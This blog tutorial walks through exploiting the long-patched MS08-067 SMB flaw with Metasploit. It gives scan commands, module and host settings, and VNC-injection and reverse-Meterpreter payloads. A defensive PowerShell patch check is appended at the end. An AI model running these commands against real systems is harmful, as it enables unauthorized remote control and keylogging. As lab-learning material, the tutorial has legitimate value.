Hello guys, in this article I'll show you how to hack a vulnerable Windows XP/Server 2003 PC with Metasploit on Backtrack.
Here I assume you are already familiar with Backtrack, or already have it installed on your PC or in a virtual machine. If you don't have it yet, or are not familiar with Backtrack or Metasploit, you can find out about it and download it here: http://www.backtrack-linux.org/.
Anyway, Metasploit was originally written in Perl but was later rewritten in Ruby; it's basically a large database of exploit code, scanners, encoders and payloads. To know more about Metasploit, visit the official website here: http://www.metasploit.com/. There is also a version for those who love Windows, so you can use it on your Windows PC. I hate Windows!
OK, here is my Metasploit terminal; I assume you already know how to get there, because this is not really a tutorial for beginners.
Anyway, if you still don't know how to get there, here it is. Remember I'm using Backtrack Linux; on Windows it's easier.
Here is the exploit we are going to use: ms08_067_netapi. I recommend using Metasploit on Linux, or at least in a Linux virtual machine; the Windows version isn't that cool.
Once we have Metasploit fired up, we type this:

nmap -sS -Pn -A 192.168.0.103

or, to scan more than one PC on the network:

nmap -sS -Pn -A 192.168.0.1/24

The IP address above is the local address of the Windows machine I'm scanning. This command port-scans your local area network to find live hosts and reports their open ports and the services (daemons) running on them. Basically, you should find SMB enabled on most of those PCs.
After we find the machine, we run:

set RHOST 192.168.0.103 (the IP address of the remote host, our Windows PC)
set LHOST 192.168.0.107 (the IP address of our own Linux PC)
set THREADS 100 (the thread value)
use windows/smb/ms08_067_netapi (the exploit we are using; SMB is used for file sharing on Windows and has the vulnerability we want to exploit)
Here is how it looks:
At this point, we use the show payloads command to get a list of suitable payloads.
Here I'm going to use reflective VNC injection as my payload. Next type:

set PAYLOAD windows/vncinject/bind_tcp

and we are all set to attack!
Next, type in exploit and let's see what happens.
Remember, you can still use other payloads too, e.g. I used

set PAYLOAD windows/meterpreter/reverse_tcp

to get access to the PC's command shell. You can reboot the computer, shut it down, get the system info and do other stuff like taking screenshots and recording keystrokes too.
Hehehe… I luv this, just hacked my Windows XP on my virtual PC!
If the exploit succeeds, you will get a VNC session; if it doesn't, it means the Windows PC has been patched. Most likely Windows XP SP1 or SP2 should work, but I don't think it will on SP3.
So get an old Windows XP PC and try the exploit on it, as I did with my old Windows XP SP1 on VMware. With this tutorial, you should be able to exploit other vulnerabilities on Windows 7, Vista etc. with Metasploit.
Remember, this is just a tutorial; do not use it on someone else's PC, and I'm not responsible for anything that happens if you try. Anyway, I'm not too sure you will find many people still using Windows XP SP1, but if you do, good luck to you.
This bug was fixed a long time ago by Microsoft in bulletin MS08-067: http://technet.microsoft.com/en-us/security/bulletin/ms08-067.
I write code... web, mobile, desktop, and hack stuff.
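If you administer Windows boxes, the useful flip side of this post is checking whether a host is still exposed. The following is an added example (not code from the original post or from Metasploit) that runs on the host itself; it assumes the MS08-067 update is identified by KB958644 and that PowerShell with Get-HotFix is available.

```powershell
# Added example, not part of the original post: verify the MS08-067 fix is
# present on this host and whether SMB is reachable from the network.
# Assumption: the MS08-067 update is shipped as KB958644.
$kb = 'KB958644'

# Get-HotFix lists installed Windows updates; when the KB is missing the
# Server service is still exposed to the netapi bug the post exploits.
$fix = Get-HotFix -Id $kb -ErrorAction SilentlyContinue

# SMB listens on TCP 445 (and 139 over NetBIOS); netstat works on every
# Windows version, so it is used here instead of newer cmdlets.
$smbListening = netstat -an | Select-String ':445\s+.*LISTENING'

if ($fix) {
    Write-Output "$kb installed on $($fix.InstalledOn): host is patched against MS08-067."
} elseif ($smbListening) {
    Write-Output "$kb NOT installed and TCP 445 is listening: apply the update now, and block 445/139 at the firewall until it is done."
} else {
    Write-Output "$kb NOT installed, but SMB is not listening; still apply the update."
}
```

Run it from an elevated PowerShell prompt on each host you are responsible for; a host that reports the second message is exactly the kind of target the exploit above succeeds against.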